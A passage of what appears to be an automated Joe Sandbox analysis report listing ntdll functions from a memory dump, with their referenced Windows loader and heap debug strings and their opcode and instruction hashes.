                                                                                                                                                                                • Opcode Fuzzy Hash: fd0ef7bfd6768d44c81e8b221c38813734fead6fb8ecae43c0491b8d3b049094
                                                                                                                                                                                • Instruction Fuzzy Hash: 0731377AE052147FEB108E89DC81F5B766CDB40684F0AC259F911B7246C6B0AA10CBE1
                                                                                                                                                                                Function 33340680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                • Opcode ID: ec058bb94ca3396dae1511e791f46c7c592963f1f77f24f9e970809b0987091a
                                                                                                                                                                                • Instruction ID: 28fdd910ff1c11b6338e43862050c23d75dd5985146f3608bf232e327bfd8e94
                                                                                                                                                                                • Opcode Fuzzy Hash: ec058bb94ca3396dae1511e791f46c7c592963f1f77f24f9e970809b0987091a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF16974B40605DFEB04CF68C984BAAB7F9FF44340F1482A9E4569B791D738E981CB91
                                                                                                                                                                                Function 33359723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                • Opcode ID: 315fdc8c447832c3189bcabb203420f57a148f28c5190c8904d89d454f8c3d50
                                                                                                                                                                                • Instruction ID: d3a41dfaf7011131ef494cfcc821a72bace11c1cc3117ffb28a7eece107440c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 315fdc8c447832c3189bcabb203420f57a148f28c5190c8904d89d454f8c3d50
                                                                                                                                                                                • Instruction Fuzzy Hash: 5251EE75A017019FF710DF28CCC0F2977E9BB84614F08866DF491ABA91EBB4A845CB92
                                                                                                                                                                                Function 3336C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 333A80E2
                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 333A80E9
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 333A80F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                • Opcode ID: 734b23ec817941e5fa165b8789ab46661381f75e30359506aaf50ebb316c9b09
                                                                                                                                                                                • Instruction ID: 8170d3cbdab2dde25d4b250aef2e3b969518a3364f42e0f3f429845b59207796
                                                                                                                                                                                • Opcode Fuzzy Hash: 734b23ec817941e5fa165b8789ab46661381f75e30359506aaf50ebb316c9b09
                                                                                                                                                                                • Instruction Fuzzy Hash: 0541D0B5D45300AFD710EF64CC80B4B7BE8EF44A54F04C92AF858F7261EA74D8018B95
                                                                                                                                                                                Function 333B43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 333B4519
                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 333B450F
                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 333B4508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                • Opcode ID: d4c63d9d746da3d4d664467c1cf8adf753c324080177b1d45936f21b5d2530c3
                                                                                                                                                                                • Instruction ID: aa9d51655c2b8a8b7c00d43e2c67c1676ce4214352eabb24e0c2ccafbe894c8a
                                                                                                                                                                                • Opcode Fuzzy Hash: d4c63d9d746da3d4d664467c1cf8adf753c324080177b1d45936f21b5d2530c3
                                                                                                                                                                                • Instruction Fuzzy Hash: F641F376A447119FDF10CF58C840A1677F8EF88650F09C6A9EC98E7A12DB30D8E0CB85
                                                                                                                                                                                Function 33327662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                                                                • Opcode ID: 5bbae8f2631b5c4846aabf95b5c28b12d21d78c2e96417d763280446a7c9a323
                                                                                                                                                                                • Instruction ID: e75f745380c801d8b47777328c8466baa0764f93126db5bd09b019182fc23691
                                                                                                                                                                                • Opcode Fuzzy Hash: 5bbae8f2631b5c4846aabf95b5c28b12d21d78c2e96417d763280446a7c9a323
                                                                                                                                                                                • Instruction Fuzzy Hash: 30014C36815640EFE3059F29E858F827BE8EF41B34F18C489F050EBA92CAB59848DA50
                                                                                                                                                                                Function 3333A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                • Opcode ID: a8fd9e55f1e56d56b52b33d0cbc57ac629bf9be82843bbefe497ebd26be73e90
                                                                                                                                                                                • Instruction ID: a0ed8b3529fc0fdcf172a89c8efc6c64fce6b8b3e1a3707e2d4dcb0d39c5da91
                                                                                                                                                                                • Opcode Fuzzy Hash: a8fd9e55f1e56d56b52b33d0cbc57ac629bf9be82843bbefe497ebd26be73e90
                                                                                                                                                                                • Instruction Fuzzy Hash: FEC19A75509786CFE311CF18C480B9AB7E8BF86764F04C96AF885CB650EB38C949CB52
                                                                                                                                                                                Function 33368322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3336847E
                                                                                                                                                                                • @, xrefs: 333684B1
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33368341
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 33368342
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                • Opcode ID: 4bec64d8c7e268e7fe81fa0784f8f2cf614889059273c731af34ebf65ae8adf9
                                                                                                                                                                                • Instruction ID: cbbe613028694a09b7296c3e844a3bde720a95380d7ee79efca000a4e6e3e103
                                                                                                                                                                                • Opcode Fuzzy Hash: 4bec64d8c7e268e7fe81fa0784f8f2cf614889059273c731af34ebf65ae8adf9
                                                                                                                                                                                • Instruction Fuzzy Hash: 88916C71949344AFE722DF24CC80EABB6ECEF88789F44892DF685D6150E734D944CB62
                                                                                                                                                                                Function 3336265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • .Local, xrefs: 333627F8
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 333A1FE8
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 333A20C0
                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 333A1FE3, 333A20BB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                • Opcode ID: 8f4c8d8dae0c73f9cfc07b4220d4cbe4637d5865938ce6d9a41917f447688ab4
                                                                                                                                                                                • Instruction ID: a020e4bab1743e7acee4fbdf44627b863c3e17c6840e489decff25ac9a097dfc
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f4c8d8dae0c73f9cfc07b4220d4cbe4637d5865938ce6d9a41917f447688ab4
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CA1A935D4432A9FDB20CF64CC84B99B3B4AF58358F1681E9D848E7255D7389E91CF90
                                                                                                                                                                                Function 333C327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}13
                                                                                                                                                                                • API String ID: 0-3518996114
                                                                                                                                                                                • Opcode ID: 102b2eba8e619cf79b61a1fc1279461cb07e2f2d09a9050312cadd22edcbbd96
                                                                                                                                                                                • Instruction ID: 8edfb77b370589827fe1c0e8b5bfb82cd6239dd09bc8c46933a839ac67646074
                                                                                                                                                                                • Opcode Fuzzy Hash: 102b2eba8e619cf79b61a1fc1279461cb07e2f2d09a9050312cadd22edcbbd96
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E816D75A49380AFE711CF14C880B6AB7E8EF84760F488929F980DB290DB78DD44CB53
                                                                                                                                                                                Function 3333B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LU03$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                • API String ID: 0-4149140204
                                                                                                                                                                                • Opcode ID: 4380e53e97c9f509af8c92fbe9a0c4bb0132aa9ead3a29e2627174e265c3301f
                                                                                                                                                                                • Instruction ID: 70c9160f573e9b635e7e226ec7c2819d49206cdfb018644dd00c2dd981acb41d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4380e53e97c9f509af8c92fbe9a0c4bb0132aa9ead3a29e2627174e265c3301f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1991BDB5E46359CBEB11CF54C8807DEB7B4EF06374F18C199E851AB290D7789A80CB91
                                                                                                                                                                                Function 333363CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33390E72
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33390EB5
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33390DEC
                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33390E2F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                • Opcode ID: 7000e90f3b409fda805384f3aca2ef484b4d652005768ba1bb6b1db5e0ac724e
                                                                                                                                                                                • Instruction ID: 69e5a94d91a6be3a0e27bd23c999823fbf4b9edaea6b812056a6116943df3c8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7000e90f3b409fda805384f3aca2ef484b4d652005768ba1bb6b1db5e0ac724e
                                                                                                                                                                                • Instruction Fuzzy Hash: AF71BEB1D493049FE790CF14C8C5B877BACEF857A0F448568F8888A586D738D588CB92
                                                                                                                                                                                Function 333290F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                • API String ID: 2994545307-1391187441
                                                                                                                                                                                • Opcode ID: 1458431bdd188e4300c120cd89c1ba3ac4e30cfb7656272479ea75a366808993
                                                                                                                                                                                • Instruction ID: 3ddc6c45a78ea3d155903ecf0b4cfee75f2ae5c7ff88505eee20413d909e1384
                                                                                                                                                                                • Opcode Fuzzy Hash: 1458431bdd188e4300c120cd89c1ba3ac4e30cfb7656272479ea75a366808993
                                                                                                                                                                                • Instruction Fuzzy Hash: FD31CF76D01249EFDB01DF55CC88F9ABBB8EF44760F14C4A1E825EB291D770E944CA60
                                                                                                                                                                                Function 33371190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e63
                                                                                                                                                                                • API String ID: 0-3560663243
                                                                                                                                                                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                • Instruction ID: 1e9e3a9b08078152886ffd0f202f63fc76eb5bb88b6d932c02cbf9bf0f23793c
                                                                                                                                                                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                • Instruction Fuzzy Hash: 43313EB6D01719BBDB118F94CC84E9EBBBDEF84654F108025E914E7660EB38DA059B90
                                                                                                                                                                                Function 333B166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                                                                                • API String ID: 0-1880532218
                                                                                                                                                                                • Opcode ID: 97e9b48e44b94068a4bc1366c5785bb3128b7421a4f06171ab1016e6d8323524
                                                                                                                                                                                • Instruction ID: 7239cf4b6c202a3bbe7015bac5a7d1fbd8c2d42568e55655dada15ee65f445ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 97e9b48e44b94068a4bc1366c5785bb3128b7421a4f06171ab1016e6d8323524
                                                                                                                                                                                • Instruction Fuzzy Hash: B721247AE42600ABDB058F589C82F9AB3F5AF45744F18C069F846A7B41EA78D905CB90
                                                                                                                                                                                Function 33337072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                • Opcode ID: 5b36b2998c8ec9e0e1b19b2b6959fd28a9b1c855c7f64d5043df77be9edeadf2
                                                                                                                                                                                • Instruction ID: 15e538a3aacc33ad12f0fcf412c53fedc73de1ab494c3260896fa502975f72f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b36b2998c8ec9e0e1b19b2b6959fd28a9b1c855c7f64d5043df77be9edeadf2
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51D935E41706EFEB05DF64C884BAEB7A8BF05321F14C16AE412A76A0DB78D911CF80
                                                                                                                                                                                Function 333C3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                                                                • Opcode ID: acf5cadc9965b22eec1ab051e7cbf1c92b5ed61b8598a52ecff1360d82de69bb
                                                                                                                                                                                • Instruction ID: 5782536c035deb6ec983fb26a84c729f7ada151de72f83b6efbbe120a063990a
                                                                                                                                                                                • Opcode Fuzzy Hash: acf5cadc9965b22eec1ab051e7cbf1c92b5ed61b8598a52ecff1360d82de69bb
                                                                                                                                                                                • Instruction Fuzzy Hash: 43F16CB5E413688BDB20CF14CCC0BD9B3B5AF44764F44C0E9E649A7250EA399E85CF5A
                                                                                                                                                                                Function 33331380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • HEAP: , xrefs: 333314B6
                                                                                                                                                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33331648
                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 33331632
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                • Opcode ID: bf487fc30c362a061e7af9a309058674d5473d14765bd9aa3d7fb28d4d83c858
                                                                                                                                                                                • Instruction ID: e56bd7ab9628ebb57f28816b639f844fa36279243218c5d91677d2fb7eb20a4f
                                                                                                                                                                                • Opcode Fuzzy Hash: bf487fc30c362a061e7af9a309058674d5473d14765bd9aa3d7fb28d4d83c858
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE1EF74E053459FE714DF68C88067ABBF9AF4A320F18C969E8D6CB245E734D944CB50
                                                                                                                                                                                Function 333B330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                • API String ID: 0-2391371766
                                                                                                                                                                                • Opcode ID: 6fea3b482662a5f69bac585b78919685ea0c7f170e243c574bf2cb866cc3f939
                                                                                                                                                                                • Instruction ID: 243e1b54d70dd57c4e12430ab396e8f2c1570b5e24bb87114b42c24948eb53cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fea3b482662a5f69bac585b78919685ea0c7f170e243c574bf2cb866cc3f939
